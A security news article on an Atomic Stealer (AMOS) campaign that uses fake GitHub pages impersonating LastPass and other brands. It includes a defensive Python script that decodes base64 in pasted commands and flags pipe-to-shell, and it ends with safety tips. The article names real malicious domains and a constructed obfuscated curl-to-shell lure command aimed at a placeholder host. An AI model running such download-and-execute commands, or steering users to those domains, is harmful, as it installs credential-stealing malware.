Cybersecurity researchers are warning Mac users about a malware campaign on GitHub. Attackers impersonate trusted companies, using fraudulent pages to distribute an infostealer that puts financial and personal data at risk.
The warning originates from LastPass Threat Intelligence, Mitigation, and Escalation (TIME) analysts. They first identified two fraudulent GitHub pages on September 16, 2025, under the username “modhopmduck476,” which purported to offer LastPass for Mac software. While these specific pages have been removed, the activity points to a broader, evolving campaign.
The attack chain begins when a user clicks a link labeled “Install LastPass on MacBook.” This redirects to hxxps://ahoastock825.github.io/.github/lastpass and then on to macprograms-pro.com/mac-git-2-download.html. That final page instructs the user to paste a command into the macOS Terminal. The pasted command carries a base64-encoded string; once decoded it yields the URL bonoud.com/get3/install.sh, which curl fetches and hands to the shell. That script then downloads a payload named “Update” into the system’s temporary directory and installs the malware from there. The terminal-paste step is the point of the lure: files fetched with curl carry no quarantine attribute, so Gatekeeper never evaluates them the way it would a browser download, and the attackers need no signed or notarized installer.
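The one-liner described above can be checked before it is ever pasted. The following Python script is an added example written for this article, not code from LastPass or from the campaign: it pulls base64 blobs out of a pasted command, decodes them, and flags the traits of this lure (a URL hidden behind base64, remote content piped straight into a shell, and a host that is not the vendor the page claims to be). The sample commands, the `.invalid` host name and the `lastpass.com/app.dmg` path are constructed for the demo; substitute the real vendor domain when using it.

```python
"""Triage a pasted "install" one-liner before it reaches the terminal.

Added example for this article; not code from LastPass or from the campaign.
It looks for the traits of the lure described above: a base64 blob decoded at
run time, a URL hidden inside that blob, and remote content piped into a shell.
"""
from __future__ import annotations

import base64
import binascii
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Runs of base64 alphabet long enough to hide a URL (short runs are just words).
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL = re.compile(r"https?://[^\s'\"`|;&()<>]+")
# "| sh", "| bash", "| zsh", "| sudo bash" ...
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")
# base64 -d, -D (older macOS) or --decode
RUNTIME_DECODE = re.compile(r"base64\s+(?:-d|-D|--decode)\b")


@dataclass(frozen=True)
class Finding:
    trait: str
    detail: str


def decoded_strings(command: str) -> list[str]:
    """Every base64 blob in the command that decodes to printable text."""
    found = []
    for match in B64_BLOB.finditer(command):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not really base64, or binary: ignore
        text = text.strip()
        if text and text.isprintable():
            found.append(text)
    return found


def triage(command: str, expected_domain: str) -> list[Finding]:
    """Return the suspicious traits of `command`.

    expected_domain is the vendor the page claims to represent; every host the
    command contacts, visible or decoded, must be that domain or a subdomain.
    """
    findings: list[Finding] = []
    if RUNTIME_DECODE.search(command):
        findings.append(Finding("runtime-decode", "decodes base64 before running it"))
    if PIPE_TO_SHELL.search(command):
        findings.append(Finding("pipe-to-shell", "pipes remote content straight into a shell"))

    visible = URL.findall(command)
    hidden = [u for text in decoded_strings(command) for u in URL.findall(text)]
    for url in hidden:
        findings.append(Finding("hidden-url", f"base64 blob decodes to {url}"))
    for url in visible + hidden:
        host = (urlparse(url).hostname or "").lower()
        if host != expected_domain and not host.endswith("." + expected_domain):
            findings.append(Finding("domain-mismatch", f"{host} is not {expected_domain}"))
    return findings


def verdict(findings: list[Finding]) -> str:
    """BLOCK on a hidden URL or pipe-to-shell, REVIEW on anything else, else OK."""
    traits = {f.trait for f in findings}
    if traits & {"hidden-url", "pipe-to-shell"}:
        return "BLOCK"
    return "REVIEW" if traits else "OK"


# Constructed samples (ours, not the campaign's).  The blob is encoded here so
# it is exact; the hosts are a reserved .invalid name and a hypothetical path.
HIDDEN_URL = "https://installer-cdn.invalid/get3/install.sh"
BLOB = base64.b64encode(HIDDEN_URL.encode()).decode()
LURE = f'curl -fsSL "$(echo {BLOB} | base64 -d)" | sh'
PLAIN = "curl -fsSLO https://lastpass.com/app.dmg"

if __name__ == "__main__":
    for cmd in (LURE, PLAIN):
        found = triage(cmd, "lastpass.com")
        print(f"{verdict(found):6} {cmd}")
        for f in found:
            print(f"       {f.trait}: {f.detail}")
```

Running it prints BLOCK for the constructed lure (four findings: runtime decode, pipe to shell, the hidden URL, and a host that is not lastpass.com) and OK for the plain download. The domain check is the part worth keeping in any paste-guard: a genuine “Install X on Mac” command has no reason to fetch anything from a domain X does not own.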
The malware payload is Atomic Stealer (AMOS), an infostealer active since April 2023 and used by financially motivated cybercriminals. This campaign extends beyond a single brand, with investigators linking it to fake repositories impersonating companies such as 1Password, Robinhood, Citibank, Docker, Shopify, and Basecamp. The primary objective is to steal sensitive user data, including credentials and financial information.
To widen the campaign’s reach and keep it running through takedowns, the attackers register multiple GitHub usernames. They also use search engine optimization (SEO) poisoning to push the fraudulent pages up the Google and Bing results, so that users searching for a legitimate installer are more likely to land on the malicious page than on the vendor’s official download site.
LastPass stated it is “actively monitoring” the campaign, working on takedowns, and sharing indicators of compromise to help other organizations detect the threat. The attackers’ method highlights how quickly fraudulent repositories can be established on platforms like GitHub, taken down, and then recreated under new aliases. This cyclical activity poses a persistent protection challenge for such community-driven platforms.
Here are some recommended safety measures to mitigate these risks:
- Download software only from the vendor’s official site, reached by typing the address yourself rather than by trusting a search result or a GitHub page that merely carries the vendor’s name.
- Never paste commands from a website into Terminal, in particular one-liners that pipe curl output into sh or decode a base64 string before running it; if you cannot read what a command does, do not run it.
- Keep macOS and all installed software fully updated; Apple’s built-in XProtect malware signatures are delivered through its automatic security updates.
- Use antivirus or endpoint protection that detects infostealers such as AMOS, not only ransomware.
- Enabling regular system backups for data recovery.
- Remaining skeptical of unexpected links, emails, and pop-ups.
- Monitoring official advisories from software vendors.
- Using strong, unique passwords combined with two-factor authentication.